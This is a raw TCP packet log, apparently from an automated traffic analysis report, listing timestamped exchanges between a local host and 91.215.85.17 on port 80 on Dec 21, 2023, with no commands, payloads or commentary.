                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.305279016 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.305283070 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.305346012 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.305393934 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.305468082 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.305491924 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.305538893 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.305854082 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.305959940 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.305999041 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306046009 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306072950 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306113958 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306159019 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306212902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306278944 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306289911 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306375027 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306395054 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306412935 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306447983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306477070 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306540012 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306576014 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306613922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306672096 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306710958 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306735039 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306771994 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306792974 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306879997 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306915045 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.306962013 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307038069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307073116 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307122946 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307220936 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307296038 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307336092 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307387114 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307465076 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307501078 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307564974 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307718039 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307756901 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307799101 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307895899 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307936907 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307960987 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.307995081 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308018923 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308069944 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308104992 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308105946 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308207989 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308253050 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308414936 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308494091 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308533907 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308573008 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308661938 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308712959 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308713913 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308768988 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308806896 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308859110 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308929920 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.308968067 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309344053 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309386015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309415102 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309457064 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309500933 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309568882 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309578896 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309637070 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309681892 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309691906 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309746981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309792995 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309812069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309878111 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309912920 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.309961081 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310049057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310098886 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310098886 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310251951 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310296059 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310409069 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310516119 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310556889 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310591936 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310655117 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310736895 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310780048 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310825109 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310914040 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310952902 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310959101 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.310990095 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311002970 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311064005 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311115980 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311124086 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311145067 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311181068 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311229944 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311302900 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311369896 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311407089 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311558962 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311644077 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311691046 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311815023 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311856985 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311913013 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.311988115 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.312027931 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.312035084 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.312159061 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.312200069 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.312213898 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.312588930 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.312654972 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.312697887 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.312752962 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.312823057 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.312870026 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.312874079 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.312933922 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.312990904 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313035965 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313035965 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313067913 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313194990 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313282013 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313352108 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313381910 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313416004 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313450098 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313505888 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313673019 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313698053 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313779116 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313817978 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313860893 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313946009 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.313993931 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.314035892 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.314131975 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.314214945 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.314260960 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.314291954 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.314302921 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.314373016 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.314451933 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.314564943 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.314590931 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.314635992 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.314680099 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.314739943 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.314834118 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.314903021 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315007925 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315067053 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315201044 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315203905 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315270901 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315311909 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315320969 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315418005 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315475941 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315509081 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315522909 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315566063 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315592051 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315680981 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315759897 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315797091 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315848112 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315888882 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315932989 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.315999985 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.316044092 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.316095114 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.316096067 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.316135883 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.316138983 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.316273928 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.316325903 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.316373110 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.316381931 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.316420078 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.316438913 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.316477060 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.316515923 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.316545010 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317015886 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317058086 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317101002 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317184925 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317265034 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317305088 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317351103 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317393064 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317434072 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317512035 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317590952 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317625046 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317677975 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317720890 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317758083 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317868948 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.317931890 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318003893 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318090916 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318208933 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318234921 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318298101 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318341017 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318389893 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318480015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318552017 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318564892 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318624973 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318670988 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318717003 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318797112 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318875074 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.318983078 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.319061995 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.319134951 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.319191933 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.319228888 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.319272041 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.319319963 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.319395065 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.319514990 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.319576979 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.319657087 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.319808960 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.319818020 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.319885015 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.319927931 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.319972038 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.320056915 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.320142984 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.320153952 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.320228100 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.320272923 CET4973880192.168.2.491.215.85.17
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.320316076 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.320401907 CET804973891.215.85.17192.168.2.4
                                                                                                                                                                                                                                                                                                                                Dec 21, 2023 05:02:29.320491076 CET804973891.215.85.17192.168.2.4
